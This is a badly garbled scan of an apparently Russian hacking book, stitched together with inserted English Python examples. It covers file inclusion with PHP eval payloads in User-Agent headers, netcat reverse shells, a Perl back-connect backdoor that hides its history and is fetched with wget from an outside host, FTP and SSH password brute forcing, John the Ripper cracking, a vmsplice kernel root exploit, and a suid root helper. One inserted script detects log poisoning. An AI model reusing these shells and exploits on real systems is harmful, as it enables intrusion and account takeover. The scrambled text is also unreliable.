curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
phpinfo() . /proc/self/environ
user-agent :
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
<?php eval($_GET[cmd]); ?> HTTP_KEEP_ALIVE=150

, user-agent
( //self/environ
).

Apache
accessjog errorJog? ,
, . /
Apache.
:
id :
/proc/%{PID}/fd/%{FD_ID}

{PID} ( , /proc/self/status), %{FD_ID} ( 2
7 Apache).
:
http://site.com/index.php?page=../../../../../../../../proc/self/status

, {PID} 1228,
:
curl "http://site.com/index.php?page=../../../../../../../../proc/1228/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

, id , self:
curl "http://site.com/index.php?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

, self ,
id . (
Apache)
.
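The log-poisoning attack of chapter 04 (PHP code planted in Referer or User-Agent, then included through a traversal parameter) and the /proc/self/environ, /proc/<pid>/fd and mail-spool variants of this chapter share one detection logic, given here as an added example that is not from the book. It reads Apache combined-log lines and tags PHP code in request headers (the poisoning step, after which the log itself is tainted), traversal and null bytes in the query, references to log files, /proc entries or mail spools, and a cmd= parameter. The log lines are constructed; pattern and function names are this example's own.

```python
"""Detection for log poisoning and /proc-based local file inclusion
(added example, not from the book)."""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (request, referer, user-agent).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jun/2010:19:27:41 +0000] "GET / HTTP/1.1" 200 451 "http://127.0.0.1/<pre><?passthru($_GET['cmd']);?></pre>" "Lynx/2.8.8rel.1 libwww-FM/2.14"
10.0.0.5 - - [27/Jun/2010:19:28:10 +0000] "GET /index.php?page=../../logs/access_log%00&cmd=ls+-la HTTP/1.1" 200 1439 "-" "Lynx/2.8.8rel.1 libwww-FM/2.14"
10.0.0.5 - - [27/Jun/2010:19:30:02 +0000] "GET /index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo(); HTTP/1.1" 200 8812 "-" "<?php eval($_GET[cmd]); ?>"
10.0.0.5 - - [27/Jun/2010:19:31:15 +0000] "GET /index.php?page=../../../../../../../../proc/1228/fd/2&cmd=id HTTP/1.1" 200 300 "-" "curl/7.19"
10.0.0.5 - - [27/Jun/2010:19:32:40 +0000] "GET /index.php?page=../../../../../../../../var/mail/wwwrun&cmd=id HTTP/1.1" 200 300 "-" "curl/7.19"
192.168.1.9 - - [27/Jun/2010:19:33:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 2100 "http://example.org/" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php|=)?|\b(passthru|system|eval|shell_exec)\s*\(", re.I)
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f|%00|\x00)", re.I)
SENSITIVE_RE = re.compile(
    r"(/proc/(self|\d+)/(environ|fd/\d+|status)|/var/mail/|/var/spool/mail/|"
    r"(access|error)[._]log)", re.I
)
CMD_PARAM_RE = re.compile(r"(^|&)cmd=")


def inspect(line: str) -> list:
    """Return the finding tags for one log line (empty list if clean)."""
    m = COMBINED_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    if PHP_TAG_RE.search(m.group("referer")) or PHP_TAG_RE.search(m.group("agent")):
        findings.append("php-code-in-header")   # poisoning attempt: log is now tainted
    query = unquote_plus(m.group("path").partition("?")[2])
    if TRAVERSAL_RE.search(query):
        findings.append("traversal")
    if SENSITIVE_RE.search(query):
        findings.append("sensitive-file")
    if PHP_TAG_RE.search(query) or CMD_PARAM_RE.search(query):
        findings.append("command-parameter")
    return findings


def scan(log_text: str) -> list:
    """(ip, findings) for every flagged line, in log order."""
    out = []
    for line in log_text.splitlines():
        f = inspect(line)
        if f:
            m = COMBINED_RE.match(line)
            out.append((m.group("ip") if m else "?", f))
    return out


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, ",".join(tags))
```

The first line is the one most detections miss: the request itself is harmless, only the Referer carries the payload, and from that moment any include of the log file executes it. Treat php-code-in-header as a sign the log must not be served or included, and pair it with the allow_url_include/open_basedir settings discussed in chapter 04.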


,
. ,
Secteam
.

-
, - . .
. *nix .
e-mail :
1. - .
2. - (, ),
, php-, .
3. wwwrun@localhost,
wwwrun , http- (
www-data, nobody, www, apache, wwwdata . .).
/var/mail ( /var/spool/mail)
, http-.
curl:
curl "http://site.com/index.php?page=../../../../../../../../var/mail/wwwrun&cmd=phpinfo();"

,
, ( -
).

09. CRLF injection

(Chapter text is not legible in the scan; the surviving fragments mention a DC++ client, FlyLinkDC++, and Codehunter aka Born.)

.
.
.
0D.
.
OF.
10.
11.
12.
13. -


( ). ? ,

(root).
, ,
0 D
-. , -,
-, 05.
, ,
netcat ( ).
Unix ( Linux). ,
-,
( ),
D V L .

netcat :
nc -l -n -v -p 25
- (25),
.
. -v (verbose )
-vv (very verbose ).
netcat :
nc -e /bin/sh -l -p 25

(back connect)
. ,
/bin/sh. IP- 127.0.0.1,
:
nc -e /bin/sh 127.0.0.1 25

,
(connect), ,

(Fig.: netcat session on Damn Vulnerable Linux; id shows uid nobody, groups=98(nobody),99(nogroup); uname -a shows i686 i386 GNU/Linux)
,
nobody.

netcat:
nc -e /bin/sh 127.0.0.1 25

Enter .
:
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]
, netcat (

) netcat (
).
id , ,
nobody,
root. uname - .
- exit
Ctrl+C.
, - netcat
-?
,
; -

(back connect shell), Google, back connect


shell download. ,
( ),
,
. , -
.
backconnect.txt. ( ,
!) ,
, wget :
wget -O /tmp/bc.pl http://mypage.narod.ru/backconnect.txt
-O (
, *-, Windows,
).
/tmp bc.pl.
curl ftp. curl :
curl -o /tmp/bc.pl http://mypage.narod.ru/backconnect.txt
,
:
chmod 755 /tmp/bc.pl
, /tmp/bc.pl
: IP - , ,
. :
/tmp/bc.pl 127.0.0.1 25


- Perl,
. http://otaku-studios.com/showthread.php/72978-Perl-Backconnect
. :
#!/usr/bin/perl
# IHS back-connect: connects to the listener given on the command line and
# attaches a shell to the socket (the victim-side half of the back-connect).
use IO::Socket;
use Socket;
use FileHandle;

$system = '/bin/bash';
$ARGC = @ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC != 2) {
    print "Usage: $0 [Host] [Port] \n\n";
    die "Ex: $0 127.0.0.1 2121 \n";
}
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
# redirect the shell's stdin/stdout/stderr into the socket
open(STDIN,  ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
# disable shell history, print system/user info, then hand over the shell
system("unset HISTFILE; unset SAVEHIST; echo --==Systeminfo==--; uname -a; echo; echo --==Userinfo==--; id; echo; echo --==Directory==--; pwd; echo; echo --==Shell==--");
system($system);
#EOF
Kate, ,
( ) /tmp
bc.pl.
, .
, , su nobody.
, .
:
chmod 755 /tmp/bc.pl
, , (
Enter):
nc -l -n -vv -p 25
:
/tmp/bc.pl 127.0.0.1 25

[Figure 0C.2: IHS Back-Connect session. Left: nc listening on port 25 prints "connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]", then "IHS BACK-CONNECT BACKDOOR", the Systeminfo/Userinfo output (groups nobody, nogroup) and Directory /root. Right: the victim side, "$ /tmp/bc.pl 127.0.0.1 25", printing Resolving HostName / Connecting... 127.0.0.1 / Spawning Shell / Connected to remote host]


(. 0.2).
, -
(uname

1] pwcl)

|<:y.;ii,i,;rr , 1 1

unset HISTFILE
unset SAVEHIST
. /
.bash_history.

, , .
, , ,

(backdoor

, , ). ,

, ,
. 11 ,
.
11

sticky bit ( drwxrwxrwt).

. - (
root) ,
drwxrwxrwx. find:
find / -type d -perm -0777 -print > /tmp/.file &

/tmp/.file.

02
/etc/passwd, ().
,
. ( ) (brute force ).
, .
( ), , ,
1-3% , .
/etc/passwd
( )
(
)
user1:user1
user2:user2
userN:userN

Windows,
Brutus AET2 ( http://www.hoobie.net/brutus).
, - PuTTY ( Windows).
PuTTY
. ,
,
, PuTTY (. 0B.1). Linux
.
21 (FTP), 110 (POP3
), 23 (telnet), 22 (SSH -
SSH). , Brutus SSH .
BruteSSH Linux Back Track 4.
PuTTY SSH .
IP- (Host name (or IP-address))
www.site.com, .

[Figure 0B.1: PuTTY Configuration, "Basic options for your PuTTY session": Host Name (or IP address) www.site.com, Port 22, Connection type SSH (alternatives Raw, Telnet, Rlogin, Serial), Saved Sessions / Default Settings, Close window on exit: Only on clean exit]

(22). (Connection type)

SSH. Open ()
. login as:, ,
SSH .
, .
127.0.0.1. ,
, .
21, 25, 110,
Port, Connection type Raw.
Open, ,
- , ,
.
Brutus (. 0B.2). ,
, ().
, 21 (FTP). FTP.
root , - ,
, , root

FTP.
, , , Pass Mode (
) Combo List Combo File
; .

Brutus example-combo.txt. , Target

. Start.
, (, , ,
) Positive Authentication Results
( ).

[Figure 0B.2: Brutus AET2 (www.hoobie.net/brutus, January 2000): Type FTP, Target 127.0.0.1, Port 21, Connections 10, Timeout 10, Use Proxy unchecked, Pass Mode Combo List, Combo File example-combo.txt, Positive Authentication Results table with Target / Type / Username / Password columns, status "idle"]

, .

(Morris and Grampp).
, 20
.
200. 200
.

( ). Brutus
- words.txt.
-.
(, , , ,
). (,
, , , . .).

Pass Mode Word List, User File Pass File ,


, .
Brutus ,
FTP- Windows.
TYPSoft FTP Server. http://soft.mydiv.net/win/files-TYPSoft-FTP-Server.html.
, ftpserv.
. , Setup FTP,
(Language russian), .
Setup Users ( )
midnight 12345 (. 0B.3).

[Figure 0B.3: TYPSoft FTP Server, List of Users: account midnight with password 12345, Root Directory C:\TEMP\, Directory Access options, "Max. of users per account", "Max. of simultaneous users per account/per IP", Time-Out (0 = no time limit), buttons New User / Copy User / Rename User / Delete User / Save]


Brutus combo.txt,
example-combo.txt,
(midnight:12345). Brutus,
. 0B.4, Start.
FTP ( ).
Main FTP- , Brutus
(. 0B.5).
. , TYPSoft FTP Server users.ini
md5-,
, .

[Figure 0B.4: Brutus run with combo.txt: Type FTP, Target 127.0.0.1, Port 21, Pass Mode Combo List, Combo File combo.txt; Positive Authentication Results: FTP / 127.0.0.1 / midnight / 12345; status line "Positive authentication at 127.0.0.1 with User: midnight Password: 12345 (2 attempts)"]

[22:50:35] [67] Connect to 127.0.0.1. Get Username.
[22:50:35] [68] Connect to 127.0.0.1. Get Username.
[22:50:35] [69] Connect to 127.0.0.1. Get Username.
[22:50:35] [70] Connect to 127.0.0.1. Get Username.
[22:50:35] [68] Authentication Fail: User ADMIN IP: 127.0.0.1
[22:50:35] [71] Connect to 127.0.0.1. Get Username.
[22:50:35] [69] User MIDNIGHT Connected
[22:50:35] [69] MIDNIGHT: Current Directory: C:\TEMP\
[22:50:35] [70] Authentication Fail: User ADMIN IP: 127.0.0.1
[22:50:35] [71] Authentication Fail: User ADMIN IP: 127.0.0.1
[22:50:35] [69] Client MIDNIGHT, 127.0.0.1 Disconnected (00:00:00 Min)
[22:50:35] [72] Connect to 127.0.0.1. Get Username.
[22:50:35] [72] Authentication Fail: User ADMIN IP: 127.0.0.1
0 Users

Fig. 0B.5. TYPSoft FTP Server log during the Brutus run

FTP.
, FTP-.
, Total Commander
, . Total Commander
( )
.
. ,
(deface) .
index.html index.php index.old,
index.html,
- ,
. , ,
, .
, .
FTP
PuTTY. localhost, 21
(Connection type) Raw.
FTP- , (. 0B.6).


220 TYPSefc FTP Server 1-10 Heady...
. s s id n ig fc t

|331 Password required for midnight.


[PASS 12345
30 User iBiduiglit logged in.
57 ///" is current directory.
:21 Goodbye

. 0 B .6 . FTP- P uTTY

22,
S SH ( ).
P u T T Y ( Windows), ssh ( Linux).
, /etc/passw d
Tima /b in /b a sh /b in /s h , - /s b in /n o lo g rin
bin/ fa ls e ( ,
). ,
. 21 ( F T P )
, 110 (P O P 3 ), :
Brutus , P O P 3
, FTP.
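The USER/PASS dialogue shown in the PuTTY session, and the combo-list brute force Brutus runs over it, as an added example that is not part of the original text and is not Brutus or TYPSoft code. It starts a throw-away FTP login responder on a loopback port (only USER, PASS and QUIT are implemented) and then drives the same combo-list logic against it; the account midnight:12345 and the combo.txt contents are constructed to match the page's setup.

```python
import socket
import threading

USERS = {"midnight": "12345"}          # constructed account, as created in TYPSoft on the page
COMBO_LIST = ["admin:admin", "admin:12345", "midnight:12345", "root:toor"]   # constructed combo.txt


def ftp_toy_server(srv, users=USERS):
    """Minimal FTP authentication dialogue: 220 banner, 331 after USER,
    230 or 530 after PASS, 221 after QUIT. Runs until the listening socket is closed."""
    while True:
        try:
            conn, _ = srv.accept()
        except OSError:
            return
        with conn:
            f = conn.makefile("rwb", buffering=0)
            f.write(b"220 Toy FTP Server ready\r\n")
            user = None
            for line in f:
                cmd, _, arg = line.decode(errors="replace").rstrip("\r\n").partition(" ")
                cmd = cmd.upper()
                if cmd == "USER":
                    user = arg
                    f.write(("331 Password required for %s.\r\n" % user).encode())
                elif cmd == "PASS":
                    if user is not None and users.get(user) == arg:
                        f.write(("230 User %s logged in.\r\n" % user).encode())
                    else:
                        f.write(b"530 Login incorrect.\r\n")
                elif cmd == "QUIT":
                    f.write(b"221 Goodbye\r\n")
                    break
                else:
                    f.write(b"502 Command not implemented.\r\n")


def ftp_try_login(host, port, user, password, timeout=5.0):
    """One authentication attempt, exactly what was typed into PuTTY; True on a 230 reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rwb", buffering=0)
        f.readline()                                   # 220 banner
        f.write(("USER %s\r\n" % user).encode())
        f.readline()                                   # 331
        f.write(("PASS %s\r\n" % password).encode())
        reply = f.readline()                           # 230 or 530
        f.write(b"QUIT\r\n")
        return reply.startswith(b"230")


def ftp_combo_bruteforce(host, port, combos):
    """Brutus 'Combo List' mode: every entry is user:password, tried in order.
    Returns (user, password, attempts) for the first hit, or None."""
    for attempts, entry in enumerate(combos, 1):
        user, _, password = entry.partition(":")
        if ftp_try_login(host, port, user, password):
            return user, password, attempts
    return None


def run_demo(combos=COMBO_LIST):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    threading.Thread(target=ftp_toy_server, args=(srv,), daemon=True).start()
    try:
        return ftp_combo_bruteforce("127.0.0.1", srv.getsockname()[1], combos)
    finally:
        srv.close()


if __name__ == "__main__":
    print(run_demo())
```

The server side of this demo is also the place to see why the TYPSoft log in Fig. 0B.5 looks the way it does: every combo entry is one full connect/USER/PASS/QUIT cycle, so a brute-force run shows up as a burst of "Authentication Fail" lines from one source address within the same second.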

Brutus -.
Use Proxy Define
-,
(. 0B.7). -
, .

[Figure 0B.7: Brutus Proxy Connection Options: Proxy Type SOCKS (v5), Proxy Address 127.0.0.1, Proxy Port 1080, checkbox "Proxy requires authentication", OK / Cancel]
BruteSSH,
SSH.
Back Track 4 root toor.
:
/etc/init.d/networking start
, startx .
,
. ,
. toor.
/pentest/passwords/brutessh aa.txt.

BackTrack > Privilege Escalation > PasswordAttacks > OnlineAttacks > BruteSSH

BruteSSH.
. :
./brutessh.py -h 127.0.0.1 -u root -d aa.txt
, root,
. 0B.8.
Back Track 4 9
, , Hydra Medusa.
, SSH, .
, ,
Xhydra (HydraGTK). Hydra

[Figure 0B.8: BruteSSH on BackTrack 4, root@bt:/pentest/passwords/brutessh# ./brutessh.py -h 127.0.0.1 -u root -d aa.txt; banner "SSH Bruteforcer", "Coded by Christian Martorella, Edge-Security Research"; the password found for root is toor]

[Figure 0B.9: Medusa (foofus.net) run against 127.0.0.1 with user root: "ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: root (1 of 4 complete)" ... "Password: toor (4 of 4 complete)", "ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: root Password: toor"]

, .
Windows.
Medusa . 0B.9.
.

*nix-
Unix
John The Ripper (www.openwall.com). .
? -, (,

PC-Linux) /etc/passwd,
. -,
. ,
/etc/shadow. -,
/etc/shadow,
. .
-,
( )
, root.
JTR (John The Ripper -)
Unix- , Windows.
Back Track 4, Windows
.
unshadow /etc/passwd /etc/shadow.
/etc/passwd, .
:
unshadow <passwd-file> <shadow-file> > <output-file>

root:JhAraBYwfjR3.:0:0:root:/:/bin/bash
mac:GGCfyAEua5zUc:11001:11001:service-myserver.com - POP:/home/mac:/bin/sh
pincher:ySb4B8nseVzEo:11002:11002:Pitch:/home/pincher:/bin/sh
luis:QQ4IBHwrKKVEA:11003:11003:thisserver.com - POP:/home/luis:/bin/sh
passwd,
( Windows john john-mmx)
*nix-

, Ctrl+C. John, ( ).
10 .
,
john --restore
,
john --show passwd
john.pot,
.
, ,
.
john single (
). .
,
/etc/passwd: ,
, . ,
, ,
ced, s, .
.
john :
john --single users.txt
users.txt .
pincher pitched.
.
: password.lst.
:
john --wordlist=password.lst users.txt
, ,
--rules:
john --rules --wordlist=password.lst users.txt
,
.
,
, . ,
, .
richard, luis. ,

:
john --incremental:alnum users.txt
alnum ( ).
( --incremental) all (--incremental:all),

(alpha).
titanic.
.
(-) (
).
--users=[-]LOGIN|UID[,..]
.
--groups=[-]GID[,..]
( )
,
--shells=[-]SHELL[,..]
Unix (
DES). 2 salt (),
, ,
, , Solaris
( SunOS).
( Linux FreeBSD)
DES,
, , ;
FreeBSD Linux MD5.
$1$, JTR FreeBSD MD5
hash. Linux ,
, Blowfish $2,
John The Ripper
.
,
(John ),
Ubuntu Linux (Back Track 4)
SHA-512, $6$, John , (
FreeBSD MD5
, .
JTR (
3500 ),
. MD5 ,

15 ,

8 *.

JTR Unix-,
DES, ,
. , ,
-, John
,
. ,
, ,
, 4-,
.
*- JTR
MySQL, MS SQL

Oracle . .

40 .
?
(
15- 20 ) .
.
,
.
,
. , Linux-
3 - , ,
.

LDAP-
LDAP *nix-.
root
/etc/passwd /etc/shadow,
LDAP .
. *-
base64.
ldap2pw
John The Ripper ( http://www.openwall.com/lists/john-users/2008/02/12/1).
, :
#!/usr/bin/perl
# ldap2pw: turn ldapsearch output (LDIF) into passwd-style lines for John the Ripper
use strict;
use MIME::Base64;

while (!eof()) {
    # eof(): we will hit eof on the inner loop for the last object anyway
    my ($cn, $uid, $dn, $passw) = ('', '', '', undef);
    while (<>) {
        # get one object; objects are separated by blank lines
        chomp;
        last if /^\s*$/;
        if (/^cn: (.+)/) {
            $cn = $1;
        } elsif (/^dn: (.+)/) {
            $dn = $1;
        } elsif (/^userP\w+:: (.+)/) {
            # base64-encoded userPassword; strip the 7-character "{crypt}" prefix
            $passw = substr(decode_base64($1), 7);
        } elsif (/^uid: (.+)/) {
            $uid = $1;
        }
    }
    # only output objects that have a password
    print "$uid\:$passw\:\:\:$cn\n" if defined $passw;
}
root
ldapsearch, ldap2pw,
ldap.pw:
ldapsearch -D "<dn for root>" -w xxxxxx -b "<base dn for users>" "" userpassword uid cn | ldap2pw > ldap.pw
ldap.pw John.
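The same LDIF-to-passwd conversion as an added example, not code from the original text or from the john-users list: it parses blank-line-separated LDIF entries, base64-decodes `attr::` values, unfolds continuation lines (which the Perl one-liner does not handle), emits the `uid:hash:::cn` lines John expects for `{crypt}` passwords, and reports entries whose scheme is something else (an `{SSHA}` entry would otherwise be fed to John as garbage). The LDIF text is constructed; the `{crypt}` hash is the root hash from the unshadow example above.

```python
import base64


def b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed ldapsearch output: a {crypt} entry, an entry without a password,
# and an {SSHA} entry whose cn is folded over two lines (LDIF continues with a leading space).
SAMPLE_LDIF = "\n".join([
    "dn: uid=alice,ou=people,dc=example,dc=com",
    "cn: Alice Example",
    "uid: alice",
    "userPassword:: " + b64("{crypt}JhAraBYwfjR3."),
    "",
    "dn: uid=bob,ou=people,dc=example,dc=com",
    "cn: Bob Example",
    "uid: bob",
    "",
    "dn: uid=carol,ou=people,dc=example,dc=com",
    "cn: Carol",
    " Example",
    "uid: carol",
    "userPassword:: " + b64("{SSHA}c2FsdGVkLWhhc2gtZ29lcy1oZXJl"),
    "",
])


def unfold(text):
    """Join LDIF continuation lines (leading space) back onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_entries(text):
    """Yield one {attribute: value} dict per entry. 'attr:: value' is base64
    (how ldapsearch prints binary values such as userPassword), 'attr: value' is verbatim."""
    entry = {}
    for line in unfold(text) + [""]:
        if not line.strip():
            if entry:
                yield entry
            entry = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode(errors="replace")
        else:
            value = value.strip()
        entry[attr.lower()] = value


def ldif_to_john(text):
    """Return (lines in John's passwd format, uids skipped because the scheme is not {crypt})."""
    lines, skipped = [], []
    for entry in parse_entries(text):
        pw = entry.get("userpassword")
        if pw is None:
            continue
        if pw.lower().startswith("{crypt}"):
            lines.append("%s:%s:::%s" % (entry.get("uid", ""), pw[len("{crypt}"):], entry.get("cn", "")))
        else:
            skipped.append(entry.get("uid", ""))
    return lines, skipped


if __name__ == "__main__":
    out, skip = ldif_to_john(SAMPLE_LDIF)
    print("\n".join(out))
    print("skipped (non-crypt scheme):", skip)
```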

MD5-
, , Windows
- MD5Inside,
InsidePro (. 0C.1).
4
. ,
. ,
- . InsidePro
PasswordsPro, ,
.
MDCrack
(21 ), http://mdcrack.openwall.net. .

(CUDA).

. MD5 (World Fastest MD5 Cracker)
BarsWF (http://3.14.by/ru/md5). GeForce GT220
[Figure 0C.1: MD5Inside (InsidePro): a list of MD5 hashes on the left, the generated candidate passwords on the right (Test, Test_A, Test_AB, Test_ABC, Test_ABCD, Test_ABCDE, Test_!, Test_!@, Test_!@#, then <Empty>, 1, 12, 123, 1234, 12345, a, ab, abc, abcd, abcde)]

153 155 ,
35-38 .
183 184 (. 0C.2).

[Figure 0C.2: BarsWF MD5 bruteforcer 0.8 (https://3.14.by/en/md5, http://3.14.by/ru/md5) by Svarychevski Michail: GPU 154.28 MHash/sec, CPU0 21.89 MHash/sec, CPU1 14.71 MHash/sec, total 183.79 MHash/sec; Hash 1b0e9fd3086d9a159a1d6cb86f11b4ca, Progress 32.84%, ETC 0 days 0 hours 26 min 24 sec]

BarsWF ,
* (,
http://hash.insidepro.com/index.php?lang=rus).

, :
barswf_cuda_x32 -h 1b0e9fd3086d9a159a1d6cb86f11b4ca - ~
.
Rainbow Tables ( )
MD5-, .
. *
.
.
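The four John the Ripper modes from the previous section (single, wordlist, wordlist with --rules, incremental) and the MD5 brute force from this one, as an added example that is not John's or BarsWF's code. The accounts, their GECOS fields, the password list and the hash values are all constructed; unsalted MD5 stands in for the DES-crypt hashes of an unshadowed file so the block needs only the standard library, and the incremental search is bounded by a maximum length so it finishes in a demo.

```python
import hashlib
import itertools
import string


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed accounts: login -> (GECOS field, hash of the password to recover).
ACCOUNTS = {
    "pincher": ("Pitch", md5_hex("pitch1")),      # falls to --single (derived from GECOS)
    "mac":     ("service", md5_hex("p@ssw0rd")),  # falls to --wordlist --rules (mangled word)
    "luis":    ("thisserver", md5_hex("ab1")),    # only --incremental:alnum finds it
}
WORDLIST = ["123456", "password", "letmein", "qwerty"]   # constructed password.lst


def single_candidates(login, gecos):
    """John's 'single' mode: guesses built from the login and the GECOS words."""
    for word in [login] + gecos.replace(".", " ").replace("-", " ").split():
        base = word.lower()
        yield base
        yield base.capitalize()
        yield base[::-1]
        for digit in "123":
            yield base + digit


def apply_rules(word):
    """A handful of the mangling rules --rules applies to each wordlist entry."""
    yield word
    yield word.capitalize()
    yield word.upper()
    yield word[::-1]
    for suffix in ("1", "123", "!"):
        yield word + suffix
    yield word.replace("a", "@").replace("o", "0")


def wordlist_candidates(wordlist, rules):
    for word in wordlist:
        yield from (apply_rules(word) if rules else (word,))


def incremental_candidates(charset=string.ascii_lowercase + string.digits, max_len=3):
    """--incremental:alnum: exhaustive search over the character set, shortest first."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            yield "".join(chars)


def crack(accounts, mode, wordlist=WORDLIST, max_len=3):
    """Return {login: password} for every account the given mode recovers."""
    found = {}
    for login, (gecos, digest) in accounts.items():
        if mode == "single":
            cands = single_candidates(login, gecos)
        elif mode == "wordlist":
            cands = wordlist_candidates(wordlist, rules=False)
        elif mode == "rules":
            cands = wordlist_candidates(wordlist, rules=True)
        elif mode == "incremental":
            cands = incremental_candidates(max_len=max_len)
        else:
            raise ValueError("unknown mode: " + mode)
        for cand in cands:
            if md5_hex(cand) == digest:
                found[login] = cand
                break
    return found


if __name__ == "__main__":
    for mode in ("single", "wordlist", "rules", "incremental"):
        print(mode, crack(ACCOUNTS, mode))
```

The ordering is the one John uses by default, cheapest first: single mode costs a few dozen hashes per account, the rules multiply the wordlist by a small constant, and incremental mode is the only one whose cost grows as charset^length, which is why the text speaks of days for an 8-character alphanumeric search even at BarsWF speeds.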

, root. ,
, , .
ssh - su.
nobody,
.
expect, . 1\
expect (
), bruteforce.exp,
su.
(
&) ,
. ,

su.

*nix-

(root). - privilege escalation, privilege
elevation (, , ).
, () -
. Linux,
(kernel) . ,
Linux (, Ubuntu, Fedora Red Hat)
.

Damn Vulnerable Linux.
exploit-db.com.
milw0rm, ,
. Damn Vulnerable Linux
/pentest/exploits/milw0rm milw0rm,
2007 , .
( platforms), (
local remote), ,
( ports). exploit-db.com , milw0rm.

nobody ( su nobody), . 0D.1,
/tmp ( cd /tmp).
. uname -a . ,
Linux 2.6.20. ,
. Google Linux kernel 2.6 local root
exploit ( 2.6 root).
Linux kernel 2.6 Local Privilege Escalation.
exploit-db.com ,
,
, ,
, .

bt ~ $ su nobody
bt ~ $ cd /tmp
bt tmp $ uname -a
Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 GNU/Linux
bt tmp $ gcc -static -W -o ex ex.c
bt tmp $ ./ex
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f4a000 .. 0xb7f7c000
[+] root
bt tmp # id
uid=0(root) gid=0(root) groups=98(nobody),99(nogroup)

Fig. 0D.1. The vmsplice exploit by qaaz

Linux kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit (www.exploit-db.com/exploits/5092),
2008 qaaz. jessica_biel_naked_in_my_bed.c (
) ,
. . ,
. Kate /tmp ex.c, ,
,
:
wget -O /tmp/ex.c http://www.exploit-db.com/download/5092
.
. (kernel exploits)
-static, .
Linux gcc (GNU Compiler).

( Compiler).

:
gcc -static -W -o ex ex.c
- (

/).

(ex.c) . (. . 0D.1),
, (warning)
(error) . (

/ /)

, : $

#, . id ,
root (uid=0).
. !
,
Linux.
2.4.17 newlocal, kmod, uselib24;
2.4.18 brk, brk2, newlocal, kmod;
2.4.19 brk, brk2, newlocal, kmod;
2.4.20 ptrace, kmod, ptrace-kmod, brk, brk2;
2.4.21 brk, brk2, ptrace, ptrace-kmod;
2.4.22 brk, brk2, ptrace, ptrace-kmod;
2.4.22-10 loginx;
2.4.23 mremap_pte;
2.4.24 mremap_pte, uselib24;
2.4.25-1 uselib24;
2.4.27 uselib24;
2.6.2 mremap_pte, krad, h00lyshit;
2.6.5-2.6.8 krad, krad2, h00lyshit;
2.6.8-5 krad2, h00lyshit;
2.6.9 krad, krad2, h00lyshit;
2.6.9-34 r00t, h00lyshit;
2.6.10 krad, krad2, h00lyshit;
2.6.13-2.6.16 raptor, raptor2, h00lyshit, prctl;
2.6.17-2.6.24.1 vmsplice;
2.6-2.6.19 (32bit) - ip_append_data() 0x82 - CVE-2009-2698;
2.6.30+ /SELinux/RHEL5 Test Kernel Local Root Exploit 0day;
2.6.31 perf_counter (x64);
2.6.1-2.6.32-rc5 pipe.c.
- -
( ),
root -,
.
SSH- .
, .
, ,
/bin/sh,
system("chmod 4755 /tmp/hack");

root chmod 4755 ( suid, 4) /tmp/hack

.
hack, :
/* hack.c: suid helper that runs the command stored in /tmp/cmd with root rights */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    char cmd[256];
    FILE *file;

    setuid(0);                         /* the original called getuid(0)/getgid(0), which set nothing */
    setgid(0);
    file = fopen("/tmp/cmd", "r");
    if (file == NULL)
        return 1;
    if (fgets(cmd, sizeof cmd, file) == NULL) {
        fclose(file);
        return 1;
    }
    fclose(file);
    system(cmd);
    return 0;
}

/tmp/cmd ,
/tmp/hack suid.
. /tmp
tmp/evi 1.

, , /tmp/
cmd.
? I I o t o m v ,
root,
( do brk).
